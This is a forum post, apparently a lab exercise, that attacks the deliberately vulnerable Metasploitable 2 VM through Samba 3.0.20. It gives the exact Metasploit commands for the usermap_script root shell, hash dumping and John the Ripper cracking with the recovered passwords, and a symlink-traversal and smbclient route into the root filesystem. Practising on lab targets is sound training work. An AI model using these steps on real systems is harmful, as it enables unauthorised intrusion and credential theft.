Metasploitable 2 滲透練習 - samba滲透 [論壇 - Ubuntu 非官方發行版討論]


正在瀏覽:   1 名遊客


 到底部   前一個主題   下一個主題  [無發表權] 請登錄或者註冊



Metasploitable 2 滲透練習 - samba滲透
會員四級
註冊日期:
2015/9/29 21:19
所屬群組:
已註冊使用者
等級: 16
HP : 0 / 380
MP : 100 / 4659
EXP: 22
離線
範例: Metasploitable 內網IP為 192.168.1.108

用 nmap -A 掃描目標主機,得知samba為3.0版
# nmap -A 192.168.1.108/24
....
Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP
|_  System time: 2016-10-02T04:07:24-04:00


啟動 metasploit
# msfconsole
找尋可用模塊
msf > search samba

=================================
破解目標主機密碼
=================================
使用 usermap_script 模塊
msf > use exploit/multi/samba/usermap_script
查看模塊資訊
msf exploit(usermap_script) > info
msf exploit(usermap_script) > set rhost 192.168.1.108
msf exploit(usermap_script) > show options
msf exploit(usermap_script) > exploit

按 Ctrl + z 中斷並退出
Background session 3? [y/N] y

查看 SESSION Id
msf exploit(usermap_script) > sessions -l

  Id  Type        Information  Connection
  --  ----        -----------  ----------
  3   shell unix               192.168.1.101:4444 -> 192.168.1.108:41131 (192.168.1.108)


使用 hashdump 模塊
msf exploit(usermap_script) > use post/linux/gather/hashdump
msf post(hashdump) > set SESSION 3
msf post(hashdump) > exploit
...
[+] Unshadowed Password File: /root/.msf4/loot/20161002165810_default_192.168.1.108_linux.hashes_945351.txt

記下 Unshadowed Password File: /root/.msf4/loot/20161002165810_default_192.168.1.108_linux.hashes_945351.txt

另外開啟終端機
# john --show /root/.msf4/loot/20161002165810_default_192.168.1.108_linux.hashes_945351.txt | awk -F'[:\t]' '{print "ID: " $1, " PASSWD: " $2}'
第一項為ID 第二項為密碼
ID: sys    PASSWD: batman
ID: klog    PASSWD: 123456789
ID: msfadmin    PASSWD: msfadmin
ID: postgres    PASSWD: postgres
ID: user    PASSWD: user
ID: service    PASSWD: service


=================================
匿名滲透
=================================
使用 samba_symlink_traversal 模塊
msf > use auxiliary/admin/smb/samba_symlink_traversal
查看模塊資訊
msf auxiliary(samba_symlink_traversal) > info

msf auxiliary(samba_symlink_traversal) > set rhost 192.168.1.108
msf auxiliary(samba_symlink_traversal) > set smbshare tmp
msf auxiliary(samba_symlink_traversal) > show options
msf auxiliary(samba_symlink_traversal) > exploit

# smbclient //192.168.1.108/tmp
Enter root's password: #直接Enter

前往根目錄
smb: \> cd rootfs
前往etc目錄
smb: \> cd rootfs/etc
查看只令選項
smb: \> ?

2016/10/2 17:50
應用擴展 工具箱


 [無發表權] 請登錄或者註冊


可以查看帖子.
不可發帖.
不可回覆.
不可編輯自己的帖子.
不可刪除自己的帖子.
不可發起投票調查.
不可在投票調查中投票.
不可上傳附件.
不可不經審核直接發帖.